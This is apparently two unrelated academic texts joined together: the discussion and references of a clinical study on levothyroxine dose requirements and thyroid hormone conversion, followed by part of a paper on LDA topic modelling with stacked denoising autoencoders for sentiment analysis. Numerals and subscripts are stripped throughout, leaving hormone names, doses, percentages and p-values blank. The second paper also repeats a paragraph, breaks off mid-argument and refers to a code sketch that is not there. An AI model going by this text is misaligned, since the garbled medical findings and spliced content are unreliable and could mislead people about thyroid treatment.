in this cohort, dose requirements for l-t -treated patients varied in a large euthyroid panel and were associated with many influences including gender, age, disease category and thyroid hormone conversion efficiency. however, not all of the treatment conditions necessarily aim at a biochemically euthyroid state as a comprehensive therapeutic goal, as defined by maintaining the respective reference ranges of all three parameters: tsh, ft and ft . particularly, in the treatment of thyroid carcinomas, for many patients in our sample the target was a lower or suppressed tsh below the reference range, which, as a consequence, raised ft levels above the upper reference range in a proportion of these patients.
at both comparable levels of tsh suppression and similar ft concentrations, athyreotic thyroid carcinoma patients were taking a higher weight-adjusted dose of l-t . three remarkable and linked observations from this study were a dissociation between ft and ft , an apparent disjoint between tsh and ft , and an inverse association between l-t dose and conversion efficiency.

the present study was a cross-sectional secondary analysis not involving a randomised design. as previously reported in a separate communication ( ), the primary aim of this prospective observational study was to analyse further the interacting equilibria. while introducing some uncontrolled variations, this allowed for the study of a broader natural spectrum of responses, as observed in consecutive patients. ft or ft measurements were not compromised in any way by problematic conditions such as the non-thyroidal illness syndrome, as the study was conducted in a cohort of otherwise 'healthy' out-patients without relevant comorbidity. there was no evidence for a potential bias stemming from a variable time interval between l-t intake and blood sampling, which might result in an expected slight temporary elevation of circulating ft concentrations, as previously discussed ( ). there were neither linear (p = . ) nor non-linear (p = . ) relationships with deiodinase activity.

in l-t treatment, equilibria typical of the healthy state were found not to be invariant, but profoundly altered ( ). here we disclose further consequences that are associated with alterations in the regulatory patterns in patients under l-t therapy. in particular, one aspect relates to the l-t dose and conversion efficiency. we estimated t –t conversion by calculating the sum activity of peripheral deiodinases (see subjects and methods). the measure is similar to the ft –ft ratio, albeit more precise in that it accounts for non-linear enzyme saturation kinetics. however, it does not further differentiate global activity by type of deiodinase. thus, the source of t or the contribution of various tissues to the t plasma pool cannot be discerned. we found that a poor converter status was associated with a higher l-t dose and higher serum ft levels but still lower absolute ft concentrations, compared to the more efficient converters. this paradoxically relates the higher t supply to a worsened rather than improved absolute ft level. this is not to say that an increasing dose will not raise the ft on average, but that the dose response varies widely among individuals, and conversion inefficiency in some patients may outweigh the dose effect in terms of achievable absolute ft concentrations. how can this be explained? a high l-t dose may not invariably remedy t deficiency owing to t -induced conversion inefficiency but could actually hinder its attainment through the inhibitory actions of the substrate itself and/or reverse t (rt ) on deiodinase type activity ( ). a study by cettour-rose et al.
( ) confirmed that rt , when infused into rats, inhibited deiodinase type activity in the pituitary, cerebral cortex and brown adipose tissue, but interestingly, this did not have much impact on circulating t , t and tsh concentrations in the animals. however, in this model the rt effect was studied under rather artificial conditions, in the absence of the abundant t supply with elevated ft levels that characterises the treatment situation. in contrast, another recent experimental study has shown that escalating only the l-t dose fails to normalise serum t in the rat and, as a result, irrespective of local variations by type of deiodinase, all organs examined, such as the brain, liver and skeletal muscle, were hypothyroid at the tissue level in the presence of a normal serum tsh ( ). this study suggests ubiquitination may be the limiting factor for t alone to restore true tissue euthyroidism in the rodent ( ). the lack of tsh stimulation and the absence or functional deficiency of the thyroid gland may also impair t –t conversion ( ).

another important consideration is that, just as ft and ft dissociate under l-t therapy, so do tsh and ft . while a high proportion of patients was able to achieve a target of a suppressed tsh below the lower reference limit or a tsh value < mu/l in autoimmune thyroiditis, their ft levels at the same time frequently remained below the median ft level found in normal subjects. the situation differs from conditions in which l-t absorption may be impaired and, as a consequence, elevated tsh levels persist ( , , ). thus, not even an l-t dose at which tsh is fully suppressed and ft by far exceeds its upper reference limit can guarantee above-average ft levels in these patients, indicating an ft –tsh disjoint. as a consequence, although dose escalation may help some patients who maintained a sufficiently efficient thyroid hormone conversion to raise their ft for euthyroidism and well-being, the strategy may not be invariably successful in all patients. in two studies, ~ % of athyreotic patients could not even raise their ft above the lower reference limit on l-t ( , ). another controlled follow-up study after hemithyroidectomy for benign euthyroid goitre suggests that this deficiency may have unwanted clinical consequences. in this study, weight gain after years, in association with a lowered thyroid function within the laboratory reference range, was interpreted as a clinical manifestation of a permanently decreased metabolic rate ( ).

l-t dose requirements have been well studied, and various regimes based on weight, bmi or more refined algorithms have been proposed to put patients on a presumed adequate dose from the very beginning ( , , , , , , , , , , , ). as useful as these algorithms may be for average predictions and initial guidance in the general population, they do not take into account individual variations in the response to l-t , such as conversion efficiency. dosing strategies solely based on a tsh definition of euthyroidism neglect the important role of ft , which has recently emerged as an equally significant parameter in defining thyroid physiology ( , , , , , ). central and peripheral regulatory mechanisms do not constitute divided levels of control, as has previously been assumed. rather, they are integrated via feed-forward control of deiodinase activity by tsh and operate jointly to maintain t homeostasis as an overarching goal ( ).
while acknowledging the role of genetically determined differences in deiodinase activity affecting conversion rates, the poor converter status described here appears to emerge mainly as a consequence of the t monotherapy itself, induced by the mechanisms discussed above ( , , , ). compared to untreated subjects, deiodinase activity and conversion efficiency tend to be diminished in l-t treatment ( , ). however, individual pre-treatment measurements were not available for comparison. we found conversion inefficiency to be significantly correlated with low residual thyroid volume and most prevalent in athyreotic patients. however, differences in deiodinase activities were also apparent in the absence of a functioning thyroid gland within the group of thyroidectomised carcinoma patients. overall, patients differ widely in the degree of the conversion impairment they suffer. this, in turn, may influence their dose requirements of l-t and, at a comparable weight-adjusted l-t dose, their levels of tsh suppression and circulating ft concentrations. we speculate that l-t -induced conversion inefficiency could prevent some vulnerable subjects from reaching true tissue normality on t monotherapy alone. those were not analysed separately in the numerous earlier t /t trials and could be possible candidates for a combined t /t treatment option, as recognised by some authors and the guidelines of the european thyroid association ( , ).

as a limitation, this study addresses biochemical treatment responses but did not evaluate patient-reported outcomes or biomarkers of thyroid hormone action. whether conversion efficiency and the resulting differences in relationships between tsh, ft and ft are clinically useful markers of dosing inadequacy requires further well-designed prospective studies. patient satisfaction, complaints and symptoms play an essential part in the clinical assessment. however, owing to considerable inter-individual variation, these measures apparently lack statistical power in a trial setting and have not been clearly linked to prognosis. for example, even a change in thyroid function as profound as the transition from the hypothyroid to the euthyroid state may be associated with only modest improvements in thyroid-related quality-of-life measures in patients with autoimmune thyroiditis ( ). as a result, a trial size of several thousand subjects may be required to produce a credible result with adequate discriminatory power. additionally, the exact outcome would depend on the overall makeup of the panel as regards the mixture of t –t conversion capabilities. possible long-term consequences of the observed biochemical alterations, such as the altered ft –ft ratio, are also presently unknown.

the findings of the present study have several clinical implications. first, they recognise thyroid hormone conversion efficiency, as defined by the calculated global deiodinase activity or more simply the t –t ratio, as an important determinant of l-t dose requirements and the biochemical response to treatment.
second, in view of a t -related ft –tsh disjoint, ft measurement should be adopted as an additional treatment target. third, in cases where an ft –ft dissociation becomes increasingly apparent following dose escalation of l-t , an alternate treatment modality, possibly t /t combination therapy, should be considered, but further randomised controlled trials are required to assess the benefit versus risk in this particular group.

declaration of interest
j w dietrich is co-owner of the intellectual property rights for the patent 'system and method for deriving parameters for homeostatic feedback control of an individual' (singapore institute for clinical sciences, biomedical sciences institutes, application number e ). all other authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported.

funding
this research did not receive any specific grant from any funding agency in the public, commercial or not-for-profit sector.

acknowledgements
the authors are grateful to hans-günther wahl, institute of laboratory medicine, klinikum lüdenscheid, for measuring thyroid hormones.

references
bjoro t, holmen j, kruger o, midthjell k, hunstad k, schreiner t, sandnes l & brochmann h. prevalence of thyroid disease, thyroid dysfunction and thyroid peroxidase antibodies in a large, unselected population. the health study of nord-trondelag (hunt). european journal of endocrinology – .
vanderpump mp, tunbridge wm, french jm, appleton d, bates d, clark f, grimley evans j, hasan dm, rodgers h & tunbridge f. the incidence of thyroid disorders in the community: a twenty-year follow-up of the whickham survey. clinical endocrinology – .
roberts cgp & ladenson pw. hypothyroidism. lancet – .
mandel sj, brent ga & larsen pr. levothyroxine therapy in patients with thyroid disease. annals of internal medicine – .
biondi b & wartofsky l. treatment with thyroid hormone. endocrine reviews – .
bianco ac, salvatore d, gereben b, berry mj & larsen pr. biochemistry, cellular and molecular biology, and physiological roles of the iodothyronine selenodeiodinases. endocrine reviews – .
pilo a, iervasi g, vitek f, ferdeghini m, cazzuola f & bianchi r. thyroidal and peripheral production of , , -triiodothyronine in humans by multicompartmental analysis. american journal of physiology. endocrinology and metabolism e –e .
jonklaas j, bianco ac, bauer aj, burman kd, cappola ar, celi fs, cooper ds, kim bw, peeters rp, rosenthal ms et al. guidelines for the treatment of hypothyroidism: prepared by the american thyroid association task force on thyroid hormone replacement. thyroid – .
baloch zw, carayon p, conte-devolx b, demers lm, feldt-rasmussen u, henry j-f, livosli va, niccoli-sire p, john r, uf j et al. laboratory medicine practice guidelines.
laboratory support for the diagnosis and monitoring of thyroid disease. thyroid – .
roos a, linn-rasker sp, van domburg rt, tijssen jp & berghout a. the starting dose of levothyroxine in primary hypothyroidism treatment: a prospective, randomized, double-blind trial. archives of internal medicine – .
santini f, pinchera a, marsili a, ceccarini g, castagna mg, valeriano r, giannetti m, taddei d, centoni r, scartabelli g et al. lean body mass is a major determinant of levothyroxine dosage in the treatment of thyroid diseases. journal of clinical endocrinology and metabolism – .
sukumar r, agarwal a, gupta s, mishra a, agarwal g, verma ak & mishra sk. prediction of lt replacement dose to achieve euthyroidism in subjects undergoing total thyroidectomy for benign thyroid disorders. world journal of surgery – .
mistry d, atkin s, atkinson h, gunasekaran s, sylvester d, rigby as & england rj. predicting thyroxine requirements following total thyroidectomy. clinical endocrinology – .
jin j, allemang mt & mchenry cr. levothyroxine replacement dosage determination after thyroidectomy. american journal of surgery – , discussion – .
ojomo ka, schneider df, reiher ae, lai n, schaefer s, chen h & sippel rs. using body mass index to predict optimal thyroid dosing after thyroidectomy. journal of the american college of surgeons – .
di donna v, santoro mg, de waure c, ricciato mp, paragliola rm, pontecorvi a & corsello sm. a new strategy to estimate levothyroxine requirement after total thyroidectomy for benign thyroid disease. thyroid – .
wiersinga wm. paradigm shifts in thyroid hormone replacement therapies for hypothyroidism. nature reviews. endocrinology – .
pepper gm & casanova-romero py. conversion to armour thyroid from levothyroxine improved patient satisfaction in the treatment of hypothyroidism. journal of endocrinology, diabetes & obesity – .
gullo d, latina a, frasca f, le moli r, pellegriti g & vigneri r. levothyroxine monotherapy cannot guarantee euthyroidism in all athyreotic patients. plos one e .
hoermann r, midgley jem, larisch r & dietrich jw. is pituitary tsh an adequate measure of thyroid hormone-controlled homoeostasis during thyroxine treatment? european journal of endocrinology – .
midgley jem, hoermann r, larisch r & dietrich jw. physiological states and functional relation between thyrotropin and free thyroxine in thyroid health and disease: in vivo and in silico data suggest a hierarchical model. journal of clinical pathology – .
hoermann r, midgley jem, giacobino a, eckl wa, wahl hg, dietrich jw & larisch r. homeostatic equilibria between free thyroid hormones and pituitary thyrotropin are modulated by various influences including age, body mass index and treatment. clinical endocrinology – .
larisch r, giacobino a, eckl w, wahl hg, midgley jem & hoermann r. reference range for thyrotropin. post hoc assessment. nuklearmedizin – .
dietrich jw, landgrafe g & fotiadou eh. tsh and thyrotropic agonists: key actors in thyroid homeostasis. journal of thyroid research – .
fellows i. deducer: a data analysis gui for r. journal of statistical software – .
r core team.
r: a language and environment for statistical computing. vienna, austria: r foundation for statistical computing. (available at: http://www.r-project.org/)
silva ej, gordon mb, crantz fr, leonard jl & larsen pr. qualitative and quantitative differences in the pathways of extrathyroidal triiodothyronine generation between euthyroid and hypothyroid rats. journal of clinical investigation – .
cettour-rose p, visser tj, burger ag & rohner-jeanrenaud f. inhibition of pituitary type deiodinase by reverse triiodothyronine does not alter thyroxine-induced inhibition of thyrotropin secretion in hypothyroid rats. european journal of endocrinology – .
werneck de castro jp, fonseca tl, ueta cb, mcaninch ea, abdalla sm, wittmann g, lechan rm, gereben b & bianco ac. differences in hypothalamic type deiodinase ubiquitination explain localized sensitivity to thyroxine. journal of clinical investigation – .
hoermann r, midgley jem, larisch r & dietrich j. integration of peripheral and glandular regulation of triiodothyronine production by thyrotropin in untreated and thyroxine-treated subjects. hormone and metabolic research – .
checchi s, montanaro a, pasqui l, ciuoli c, de palo v, chiappetta mc & pacini f. l-thyroxine requirement in patients with autoimmune hypothyroidism and parietal cell antibodies. journal of clinical endocrinology and metabolism – .
liwanpo l & hershman jm. conditions and drugs interfering with thyroxine absorption. best practice & research. clinical endocrinology & metabolism – .
robertson hma, narayanaswamy akp, pereira o, copland sa, herriot r, mckinlay aw, bevan js & abraham p. factors contributing to high levothyroxine doses in primary hypothyroidism: an interventional audit of a large community database. thyroid – .
toft kristensen t, larsen j, pedersen pl, feldthusen a-d, ellervik c, jelstrup s & kvetny j. weight gain and serum tsh increase within the reference range after hemithyroidectomy indicate lowered thyroid function. journal of thyroid research .
fish lh, schwartz hl, cavanaugh j, steffes mw, bantle jp & oppenheimer jh. replacement dose, metabolism, and bioavailability of levothyroxine in the treatment of hypothyroidism. new england journal of medicine – .
banovac k, carrington sa, levis s, fill md & bilsker ms. determination of replacement and suppressive doses of thyroxine. journal of international medical research – .
gordon mb & gordon ms. variations in adequate levothyroxine replacement therapy in patients with different causes of hypothyroidism. endocrine practice – .
baehr km, lyden e, treude k, erickson j & goldner w. levothyroxine dose following thyroidectomy is affected by more than just body weight. laryngoscope – .
de lima jg, de mesquita djtm, da costa fernandes f, de souza abc, santos junior dos ac, reboucas b, de lima nn, sousa agp & nobrega lhc. comparison among the daily levothyroxine doses according to the etiology of hypothyroidism. journal of endocrinology and metabolism – .
abdalla sm & bianco ac. defending plasma t is a biological priority. clinical endocrinology – .
fonseca tl, correa-medina m, campos mpo, wittmann g, werneck-de-castro jp, arrojo e drigo r, mora-garzon m, ueta cb, caicedo a, fekete c et al. coordination of hypothalamic and pituitary t production regulates tsh expression. journal of clinical investigation – .
hoftijzer hc, heemstra ka, visser tj, le cessie s, peeters rp, corssmit epm & smit jwa. the type deiodinase orfa-gly asp polymorphism (rs ) influences the set point of the hypothalamus–pituitary–thyroid axis in patients treated for differentiated thyroid carcinoma. journal of clinical endocrinology and metabolism e –e .
panicker v, saravanan p, vaidya b, evans j, hattersley at, frayling tm & dayan cm. common variation in the dio gene predicts baseline psychological well-being and response to combination thyroxine plus triiodothyronine therapy in hypothyroid patients. journal of clinical endocrinology and metabolism – .
taylor pn, panicker v, sayers a, shields b, iqbal a, bremner ap, beilby jp, leedman pj, hattersley at, vaidya b et al. a meta-analysis of the associations between common variation in the pde b gene and thyroid hormone parameters, including assessment of longitudinal stability of associations over time and effect of thyroid hormone replacement. european journal of endocrinology – .
mcaninch ea, jo s, preite nz, farkas e, mohácsik p, fekete c, egri p, gereben b, li y, eng y et al. prevalent polymorphism in thyroid hormone-activating enzyme leaves a genetic fingerprint that underlies associated clinical syndromes. journal of clinical endocrinology and metabolism – .
wiersinga wm. do we need still more trials on t and t combination therapy in hypothyroidism? european journal of endocrinology – .
wiersinga wm, duntas l, fadeyev v, nygaard b & vanderpump mpj. eta guidelines: the use of l-t + l-t in the treatment of hypothyroidism. european thyroid journal – .
watt t, cramon p, hegedüs l, bjorner jb, bonnema sj, rasmussen åk, feldt-rasmussen u & groenvold m. the thyroid-related quality of life measure thypro has good responsiveness and ability to detect relevant treatment effects.
journal of clinical endocrinology and metabolism – .
received in final form august ; accepted august .

beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling
noura al moubayed, stephen mcgough and bashar awwad shiekh hasan
department of computer science, durham university, durham, uk; department of computer science, university of newcastle upon tyne, newcastle, uk; caspian learning, newcastle upon tyne, uk

abstract
the article presents a discriminative approach to complement the unsupervised probabilistic nature of topic modelling. the framework transforms the probabilities of the topics per document into class-dependent deep learning models that extract highly discriminatory features suitable for classification. the framework is then used for sentiment analysis with minimum feature engineering. the approach transforms the sentiment analysis problem from the word/document domain to the topics domain, making it more robust to noise and incorporating complex contextual information that is not represented otherwise. a stacked denoising autoencoder (sda) is then used to model the complex relationship among the topics per sentiment with minimum assumptions. to achieve this, a distinct topic model and sda per sentiment polarity is built, with an additional decision layer for classification. the framework is tested on a comprehensive collection of benchmark datasets that vary in sample size, class bias and classification task. a significant improvement to the state of the art is achieved without the need for a sentiment lexicon or over-engineered features. a further analysis is carried out to explain the observed improvement in accuracy.

subjects artificial intelligence, data mining and machine learning, data science, natural language and speech
keywords topic modelling, stacked denoising autoencoders, text classification, sentiment analysis

introduction
the rise of social media and online reviews has resulted in an exponential increase in the available data. facebook has over a billion and a half active users a month (smith, ) with billions of comments and social reactions (in the form of like, love, etc.). twitter, the largest micro-blogging website, has millions of users (clement, ) writing million tweets on a daily basis. customer reviews are a standard feature of almost every online purchasing service (e.g. amazon or expedia).
this vast wealth of data is raising the need for sophisticated analysis methods to better understand and exploit the knowledge hidden in the data. a successful approach is probabilistic topic modelling, which follows a hierarchical mixture model methodology to unravel the underlying patterns of words embedded in large collections of documents (blei, carin & dunson, ; hofmann, ; canini, shi & griffiths, ). the discovery of these patterns, known as topics, opens the doors for deeper analysis of the data including: clustering, sorting, summarisation, and prediction (blei, carin & dunson, ). latent dirichlet allocation (lda) (blei, ng & jordan, ) is one of the most commonly used probabilistic topic modelling methods. it decomposes a collection of documents into its salient topics. a topic in lda is a probability distribution over the documents' vocabulary. lda assumes a fixed number of topics set a priori and that each document may contain a combination of topics. lda, and its variants (teh et al., ; porteous et al., ), is a completely unsupervised method with very few prior assumptions, which has led to its popularity in text summarisation and clustering of large unstructured datasets. however, when labelled data is available it would be beneficial to include the class label in the model itself, as demonstrated in (mcauliffe & blei, ; perotte et al., ; huh & fienberg, ; zhu, ahmed & xing, ). latent dirichlet allocation has been customised to accommodate specific application areas like sentiment analysis. sentiment analysis tries to understand the sentiment behind the written text, for example product reviews. this problem has drawn a lot of attention in the last few years given the social and commercial impact it has (bradley & lang, ; bravo-marquez, mendoza & poblete, ; go, bhayani & huang, ; liu, ). in a highly competitive online market, the deeper the understanding of customer views and attitudes, the further advantage a business can have against the competition. jo & oh ( ) extended lda to include sentence modelling with aspect/sentiment. mei et al. ( ) and lin & he ( ) explicitly model the sentiments in the data and then train the model in an unsupervised approach similar to the standard lda. topic modelling for sentiment analysis reduces the need for hand-crafted features and especially annotated corpora (bradley & lang, ; cambria, havasi & hussain, ; esuli & sebastiani, ; nielsen, ). in this work, we take a novel approach to expand the modelling power of lda within a supervised framework. the framework builds a separate lda model per class. each lda is then used as a feature extractor to train a stacked denoising autoencoder (sda).
the trained sdas are used to generate the input to a simple classifier. the added layer of sdas helps further increase the discriminability among the classes and hence achieve higher classification accuracy. the introduced framework addresses the following points: (i) it avoids language-specific sentiment lexicons and directly engineered features on the word/sentence level; instead, we focus on modelling higher-level abstract concepts/topics. (ii) the system learns, through hierarchical structure modelling, to better understand the inter-dependencies among words and topics that convey the sentiment. (iii) the framework is very general and can easily be adapted to different tasks and data sets with minimum feature engineering. this approach is motivated by three key points:
• context embedding: topic modelling through a probabilistic mixture approach (e.g. latent dirichlet allocation) is highly advantageous in modelling the context in which words may appear given a sentiment. this also transfers the classification problem from the word space (or an engineered feature space of words) to the topic space, making the whole system much more robust to noise.
this involved standard natural language processing (nlp) techniques such as bag of words (pang, lee & vaithyanathan, ), word vectors (maas et al., ; pouransari & ghili, ), n-grams (nguyen et al., ), and rule-based classifiers (riloff, wiebe & phillips, ). despite their initial success these methods performed worse than expected in comparison with other topic categorisation problems, as the approaches taken were not designed specifically for sentiment classification. al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to incorporate prior information into the feature extraction method a lexical resource for sentiment analysis is needed to assign a polarity (e.g. positive, negative, or neutral) to the words independent of the context. wilson, wiebe & hoffmann ( ) built the opinion finder lexicon on individual words and then used it to define sentiment at the level of phrases. a similar approach was taken by zirn et al. ( ) which uses a sophisticated markov chain method to predict the contextual sentiment of words within phrases or short text. another commonly used lexicon for english language was presented by bradley & lang ( ) and later used for twitter sentiment analysis by nielsen ( ). other well-known lexicons include sentistrength (thelwall, buckley & paltoglou, ) and nrc (mohammad & turney, ). for more discussion and comparisons among the lexical resources the interested reader is referred to the work by bravo-marquez, mendoza & poblete ( ), where the authors also combined features from several lexical resources to enhance the performance of the overall system. an appraisal group of sentiments was developed by whitelaw, garg & argamon ( ) and then used to produce bag of words features. based on the psychological definition of emotional states, mohammad & turney ( ) labelled a word bank for sentiment analysis. to establish more context aware features kennedy & inkpen ( ) used contextual valence shifters to rank words within a text which can then be fed to a classifier. nguyen et al. ( ) used ratings (labelled or predicted) to enhance the performance of a word vector based sentiment analysis system. a sophisticated feature engineering approach was used for twitter data by agarwal et al. ( ). it starts by using a polarity dictionary to assign a prior polarity to each word and then a tree representation of tweets is designed to combine many categories of features in one structure. a convolution kernel is then employed to compare among several trees. tang et al. ( b) used neural networks to learn sentiment specific word embedding (sswe) to transform words into a continuous representation that takes into account the sentiment and syntactic context of words. in the context of information retrieval, eguchi & lavrenko ( ) used a generative probabilistic model for topic modelling in order to retrieve documents with certain sentiment/polarity. the model extends the definition of topics within the text to model sentiments. the user would then request documents by topic and sentiment. a topic sentiment mixture model was proposed by mei et al. ( ) which builds sentiment models for positive and negative opinions and extract topic models with their relevant sentiment coverage. similarly a joint sentiment/topic model (jst) was presented by lin & he ( ) that extends the well known unsupervised model, lda. jst was further extended by jo & oh ( ) to handle words from several languages. 
the advantage of topic modelling in general is that: (i) it allows for the extraction of useful information without the need for significant feature engineering. (ii) the dimensionality of the resulting feature space can be set a-priori and is usually much smaller than the sparse feature vectors resulted from bag of words or n-grams. (iii) lda, and other bayesian topic models, is adaptive by definition providing the overall system with the ability to handle streams of data very efficiently. (iv) transforming the input space to topics space makes the classifier less sensitive to noise. in “methods” we present lda in its original form before using it later to extract topic features (without modelling the al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sentiment). the sentiment modelling is carried out on a later stage using deep neural networks. classification following topic categorisation problems several machine learning classification methods (mostly supervised) are commonly employed. maximum entropy classifier, which measures the amount of information the features can ‘tell’ about the polarity/sentiment, was used repeatedly (pang, lee & vaithyanathan, ; saif et al., ). naive bayes classifier was also used by wu & pao ( ). however, support vector machines (svm) are arguably the most widely used approach for sentiment prediction (agarwal et al., ; bravo-marquez, mendoza & poblete, ; nguyen et al., ; wu & pao, ). more recently deep neural networks have been adopted for sentiment analysis after their impressive performance in several tasks under the umbrella of nlp (collobert et al., ). pouransari & ghili ( ) utilised a recursive neural network (rnn) to model not only the individual words but how they appear in relationship to each other within a phrase of a given sentiment. rnn is commonly used in nlp due to their ability to model such structures. however, to represent complex relationships (e.g. negated positive) socher et al. ( ) presented recursive neural tensor networks. a combined rnn model that takes into account the aspect extraction and sentiment representation was presented in lakkaraju, socher & manning ( ) using a hierarchical deep learning framework. a dynamic convolutional neural network was used by kalchbrenner, grefenstette & blunsom ( ) to handle input sentences of varying length capturing short and long-range relations, which could be particularly important for sentiment analysis. tang et al. ( a) used the same neural networks for sswe but with added convolutional layers for category prediction. wu & pao ( ) built a deep feed-forward neural network to extract and classify high level features obtained from n-grams with the aim of reducing the complexity of feature engineering. a brief review and comparison of performance in sentiment analysis among rnn, and convolutional networks is discussed by shirani-mehr ( ) where the authors find, based on testing on one dataset only, that convolutional neural networks with word vector features performed better than the other networks or the baseline naive bayesian classifier. most relevant to our work are semi-supervised recursive autoencoders (ae) which were introduced for sentiment analysis by socher et al. ( ). the authors used ae (described in “stacked denoising autoencoders”) without a predefined structure with a combined reconstruction and cross entropy errors as the optimisation objective of the structural learning approach. 
ae-based algorithms were used by mirowski, ranzato & lecun ( ) to model a bag of words for text classification, topic modelling, and sentiment analysis tasks using a similar semi-supervised approach. pollack ( ) introduced recursive ae as a compact distributed representation method for data, including textual data. however, the approach relied on a binary word representation requiring a large sparse input space. to enhance generalisation, a linear modification was introduced by voegtlin & dominey ( ) but with the same binary features. word vector features were used by socher et al. ( ), which are argued to be more suitable for ae, which require continuous data by definition.

methods
our framework aims at finding a uniform way of representing variable-sized phrases and then using this representation effectively to achieve accurate sentiment classification. topic modelling is used as a feature extraction method which provides a robust representation that requires minimum feature engineering, is independent of the language used and does not need a task-specific lexicon. it also converts a variable-length document to a vector of probabilities (i.e. continuous variables), which is an advantage when modelling with stacked ae. the ae uses the input topic model representation of all the documents labelled as conveying a specific task (e.g. sentiment) to build a structural representation that defines that task. the res of the different aes are then used by a simple classifier (we explore several options in "classification approach") to provide the final prediction of the task perceived from the input document. shifting the problem from word and phrase representation to topic representation has the advantage of building more dynamic and robust systems, where small changes on the document level (or the introduction of new documents) will not cause a major change in how the topics are represented, opening the door for adaptive text classification models that are able to cope with the fast-changing content of the web. figure describes the process of sentiment analysis using the proposed framework in this article. the input data from several resources is separated into negative and positive polarity. two topic models are then built using the polarity-specific data. the extracted features from each topic model are used to train the corresponding sda model. to predict the sentiment of a given text, it is passed through the two topic models and the two sdas, resulting in an overall reconstruction error (ore) per sda, which are used by a linear classifier to predict the polarity (a minimal code sketch of this per-polarity pipeline is given after the description of the stacked denoising autoencoders below).

topic modeling
consider, conceptually, that a phrase expressing a given task/sentiment is formed from a collection of words which are commonly used to express that sentiment. by capturing those task-related words, in the form of a topic, we should be able to capture the sentiment of a phrase (or document) more accurately than conventional keyword analysis. building a text/language model that transforms the words into an abstract (vector) representation should result in more informative features that are less affected by 'noise' at the word or even document level. this area of research is referred to as topic modelling (blei, ). within the context of a given text classification task, topic models are able to automatically include contextual information, which is particularly helpful in cases where a word might reflect different sentiments in different domains/topics (e.g. 'easy' would be a positive sentiment in the context of the use of household items, but an 'easy' online game would be perceived negatively). topic models are built as a bayesian network (blei, ) where the observed variables (the words) can be generated by realisation of random variables within the network. the network is equivalent to a mixture of models, that is, a document is associated with the probability of it containing a topic
within the context of a given text classification task, topic models are able to automatically include contextual information, which is particularly helpful in cases where a word might reflect different sentiments in different domains/topics (e.g. 'easy' would be a positive sentiment in the context of the use of household items, but an 'easy' online game would be perceived negatively). topic models are built as a bayesian network (blei, ) where the observed variables (the words) can be generated by realisation of random variables within the network. the network is equivalent to a mixture of models, that is, a document is associated with the probability of it containing a topic, and a document could include more than one topic. a word can be in more than one topic and a topic consists of more than one word. the probability of each document containing each of the topics can be used for further analysis. latent dirichlet allocation (blei, ng & jordan, ) is the most commonly used method for topic modelling (al moubayed, wall & mcgough, ). lda works by measuring the co-occurrence statistics of words/terms in a set of documents, leading to recognising the topic structure within those documents. the only assumptions made by lda are the number of underlying topics, k, responsible for generating the documents, and a multinomial distribution of each topic over the words in the vocabulary. a document can then be seen to be generated by sampling a finite mixture of topics and then sampling words from each of these topics. the ordering of the words is irrelevant to lda.

figure : a schematic description of the overall classification scheme for sentiment analysis using the proposed framework. from bottom up, the data come from various resources. data is separated per sentiment and a topic model per sentiment is built. all the data are then passed through the topic models to generate features used by two sdas for the positive and negative sentiment. finally a classifier is used to predict the output.

here we briefly describe lda. we model each document $w$, from a corpus $D$ that contains $N$ words, as a generative process:

- choose $\theta \sim \mathrm{Dir}(\alpha)$.
- for each of the $N$ words $w_n$: choose a topic $z_n \sim \mathrm{Multinomial}(\theta)$ and draw $w_n$ from the multinomial probability conditioned on the topic $z_n$, $p(w_n \mid z_n, \beta)$.

where dir is the dirichlet function and $\alpha$ is a k-dimensional vector parameter with $\alpha_i > 0$. for $k$ topics the probability density of $\theta$ is defined as:

$$p(\theta \mid \alpha) = \frac{\Gamma\!\left(\sum_{i=1}^{k} \alpha_i\right)}{\prod_{i=1}^{k} \Gamma(\alpha_i)}\, \theta_1^{\alpha_1 - 1} \cdots \theta_k^{\alpha_k - 1}$$

where $\Gamma$ is the gamma function. given the auxiliary parameters $\alpha$ and $\beta$, the joint distribution of a topic mixture $\theta$, topics $z$ and words $w$ is defined as:

$$p(\theta, z, w \mid \alpha, \beta) = p(\theta \mid \alpha) \prod_{n=1}^{N} p(z_n \mid \theta)\, p(w_n \mid z_n, \beta),$$

where $p(z_n \mid \theta) = \theta_i$ for the unique $i$ such that $z_n^i = 1$. to obtain the document probability density we can marginalise over $\theta$ and $z$:

$$p(w \mid \alpha, \beta) = \int p(\theta \mid \alpha) \left( \prod_{n=1}^{N} \sum_{z_n} p(z_n \mid \theta)\, p(w_n \mid z_n, \beta) \right) d\theta$$

the corpus probability is then defined as:

$$p(D \mid \alpha, \beta) = \prod_{d=1}^{M} \int p(\theta_d \mid \alpha) \left( \prod_{n=1}^{N_d} \sum_{z_{dn}} p(z_{dn} \mid \theta_d)\, p(w_{dn} \mid z_{dn}, \beta) \right) d\theta_d$$

efficient parameter estimation is usually done through variational bayesian methods or gibbs sampling (blei, ng & jordan, ). the complete description of lda is beyond the scope of this paper; interested readers are referred to blei, ng & jordan ( ).
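to make the generative process above concrete, the following numpy sketch samples a toy document from an lda model; the vocabulary, number of topics and parameter values are illustrative assumptions, not values used in this study.

```python
# toy simulation of the lda generative process: theta ~ Dir(alpha),
# z_n ~ Multinomial(theta), w_n ~ Multinomial(beta[z_n]).
import numpy as np

rng = np.random.default_rng(0)
vocab = ["good", "bad", "plot", "actor", "boring", "great"]   # assumed toy vocabulary
k = 3                                                         # assumed number of topics
alpha = np.full(k, 0.5)                                       # symmetric dirichlet prior
beta = rng.dirichlet(np.ones(len(vocab)), size=k)             # per-topic word distributions

def generate_document(n_words):
    theta = rng.dirichlet(alpha)                 # topic mixture of this document
    words = []
    for _ in range(n_words):
        z = rng.choice(k, p=theta)               # topic assignment for this word
        w = rng.choice(len(vocab), p=beta[z])    # word drawn from the chosen topic
        words.append(vocab[w])
    return theta, words

theta, doc = generate_document(10)
print(theta, doc)
```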
lda has been widely used for text modelling and classification. in the context of sentiment analysis, several studies have tried to extend the original lda model for polarity classification (eguchi & lavrenko, ; mei et al., ; lin & he, ). however, these methods focused on adding an additional layer of abstraction (via latent variables) to describe the different sentiments of interest. this is limited by the strong assumptions built into the bayesian network. in this work we use a deep neural network (explained in the next section) which can model complex relationships among the topics that are responsible for generating the documents. this approach requires minimum assumptions about the relationship between topics/documents and sentiments.

